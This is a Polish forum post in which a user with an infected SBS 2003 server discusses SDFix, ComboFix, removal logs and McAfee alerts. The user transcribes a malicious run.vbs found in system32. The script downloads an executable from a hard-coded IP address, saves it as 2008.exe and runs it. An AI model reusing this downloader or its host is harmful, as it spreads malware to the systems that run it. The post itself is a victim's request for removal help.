poczytałem twój link o sdfix. Piszą, że jest do xp i 2000, żaden z 3 problemów opisanych na stronie:
http://downloads.andymanchesta.com/Remo … ReadMe.htm u mnie nie występuje
Poszperałem trochę w tym runthis.bat i znalazłem takie warunki:
ver|%systemroot%\system32\find.exe “Windows XP”>nul && set TypeOS=XP
if [%TypeOS%]==[XP] goto Start
ver|%systemroot%\system32\find.exe “Windows 2000”>nul && set TypeOS=W2K
if [%TypeOS%]==[W2K] goto Start
goto end
Przypuszczam, że tutaj sbs2003 nie przechodzi weryfikacji i sdfix kończy pracę, mogę to tak zmodyfikować, żeby nie sprawdzał systemu i poleciał na sbs2003, czy to będzie bezpieczne?
Klucze do usunięcia dla combifix usunąłem log po usuwaniu tutaj:http://www.wklej.org/id/a8b81ca054
log po resecie tytaj:http://www.wklej.org/id/9df20bdaad
Te dwa wpisy raczej nie były groźne, ale są wykluczone.
Combo często usuwa mi plik 2008.exe
w katalogu system32 pojawia się plik run.vbs o takiej zawartości: http://www.wklej.org/id/37a7416565
tłumacząc na nasze, żeby oszczędzić Tobie cenny czas, który mi poświęcasz:
set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
xPost.Open GEThttp://61.162.230.146/1.exe0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile 2008.exe2
oshell.run 2008.exe
nie znam się na skryptach, ale chyba wychodzi na to, że pobiera sobie z netu plik i zapisuje go jako 2008.exe
Te pliki kasuje combofix, skryptu, żaden program nie uważa za wirusa, a o pliku tworzącym skrypt to juz w ogóle cisza.
Ten link virusscan.lotti jest rewelacyjny, skanuję wszystkie pliki, które wydają mi się podejrzane. Pliku schost.sys~ już nie przeskanuję, bo w akcie desperacji wyciąłem go wczoraj:)
Tutaj alerty mcafee z ostatnich kilku dni:http://www.wklej.org/id/8f0f3f4ed0
Powoli kończą mi się pomysły, a do tego serwer w ciągu dnia musi hulać, myślisz, że to się rozłazi w sieci, na razie żadna stacja nic nie zgłasza:(
